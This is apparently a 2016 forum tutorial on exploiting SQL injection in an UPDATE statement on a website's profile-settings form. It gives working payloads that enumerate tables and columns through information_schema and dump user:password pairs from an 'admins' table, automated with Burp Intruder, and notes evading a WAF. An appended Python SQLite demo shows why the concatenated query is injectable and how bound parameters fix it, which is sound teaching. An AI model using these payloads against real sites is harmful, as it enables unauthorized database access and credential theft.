By: danielkhaoticen
September 15, 2016

Tutorial: SQL injection inside UPDATE query

SQL injection inside UPDATE query [Tutorial]

This tutorial will help you with SQLi inside an UPDATE query. The SQLi is located in the profile settings.
Picture of settings panel:
The vulnerable parameter is the "E-mail format:" value. We use Tamper Data to intercept and change the values.
Picture of intercepted values:
After we click "OK" we get this.
Picture of MySQL error:
First we want to find the database version, but what would be the easiest way? We can set the value of other parameters, and MySQL will let us do that as long as the parameter is one of the columns in the UPDATE query. We will use "fname", which is a string value. The output of our query will be shown inside the "First name" input box (where it says MaXoNe).
Picture of version query:
Picture of rendered content with database answer:
Now that we know how to create our query, let's get the tables.
Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '
Picture of get tables query:
Picture of rendered content with database answer:
Three tables, strange!? Let's check that again. We use count.
Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '
Picture of get tables count query:
Picture of rendered content with database answer:
Now it is time for Burp Intruder. Set the browser to use 127.0.0.1 port 8080 as the proxy for all URLs. We use Burp Suite Intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers".
Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '
Picture of Burp settings:
That's all, and now you just get the columns the same way with Burp Suite.
Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '
Just increment n with Burp Suite. (0x61646d696e73 is the hex encoding of the string "admins", which avoids putting quotes inside the injected string.)
Values:
Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '
Just increment n with Burp Suite.
That's it. Simple, yet effective. I used this because the WAF blocked -- and --+, so I wasn't able to close and comment out the query.
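Why the "E-mail format" field is injectable at all comes down to how the UPDATE statement is built. The following is an added example, not code from the tutorial or from the vulnerable site: it constructs a small in-memory SQLite schema (the real site's schema is unknown) and shows the same settings update written two ways. The concatenating version lets a value in the shape of the tutorial's payload rewrite other columns (here a version subquery stands in for MySQL's, and a subquery result lands in fname exactly as the tutorial describes); the parameterized version stores the payload as a harmless string. A lone quote against the concatenating version also reproduces the kind of database error the tutorial's first screenshot shows, which is the error a defender wants logged and alerted on rather than echoed to the user.

```python
import sqlite3

# Constructed demo schema: one profile row, standing in for the tutorial's
# settings form. Column names are assumptions, not the target's real schema.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    fname TEXT,
    phone TEXT,
    email_format TEXT
);
INSERT INTO users VALUES (1, 'MaXoNe', '555-0100', 'text');
"""


def fresh_db():
    """Return an in-memory SQLite database seeded with the demo row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_update(conn, uid, fname, phone, email_format):
    """Build the UPDATE by string concatenation, as the tutorial's target did.
    email_format is the last assignment before WHERE, which is why a payload
    ending in `phone = '` lines up with the application's own closing quote.
    SQLite keeps only the rightmost assignment when a column is set twice,
    so the injected fname/phone assignments win over the legitimate ones."""
    sql = (
        "UPDATE users SET fname = '" + fname + "', phone = '" + phone + "', "
        "email_format = '" + email_format + "' WHERE id = " + str(uid)
    )
    conn.execute(sql)
    conn.commit()
    return sql


def safe_update(conn, uid, fname, phone, email_format):
    """Same update with bound parameters: values travel separately from the
    statement text, so quotes and commas in email_format are just data."""
    sql = "UPDATE users SET fname = ?, phone = ?, email_format = ? WHERE id = ?"
    conn.execute(sql, (fname, phone, email_format, uid))
    conn.commit()
    return sql


def profile(conn, uid):
    """Read the row back, mirroring the settings page re-rendering the form."""
    row = conn.execute(
        "SELECT fname, phone, email_format FROM users WHERE id = ?", (uid,)
    ).fetchone()
    return {"fname": row[0], "phone": row[1], "email_format": row[2]}


# Constructed payload in the shape the tutorial uses; sqlite_version() stands
# in for the MySQL version subquery the tutorial sends.
PAYLOAD = "html' , fname = (select sqlite_version()) , phone = '"


def demo():
    """Run the payload through both code paths and return what each stored."""
    results = {}
    conn = fresh_db()
    vulnerable_update(conn, 1, "MaXoNe", "555-0100", PAYLOAD)
    results["vulnerable"] = profile(conn, 1)
    conn.close()

    conn = fresh_db()
    safe_update(conn, 1, "MaXoNe", "555-0100", PAYLOAD)
    results["safe"] = profile(conn, 1)
    conn.close()
    return results


def malformed_input_error(conn, value):
    """A stray quote breaks the concatenated statement and the database rejects
    it, like the MySQL error in the tutorial. Returns True if that happened."""
    try:
        vulnerable_update(conn, 1, "MaXoNe", "555-0100", value)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    for label, row in demo().items():
        print(label, row)
    print("lone quote rejected:", malformed_input_error(fresh_db(), "'"))
```

With the concatenating path, fname comes back holding the version string and phone is blanked, because the rightmost assignment of each column is the injected one; with bound parameters, fname and phone are untouched and email_format contains the literal payload text. Commenting out the tail of the query (which the tutorial's WAF blocked) was never needed for this injection, so filtering `--` alone is not a fix; the fix is the parameterized statement.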
I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments :)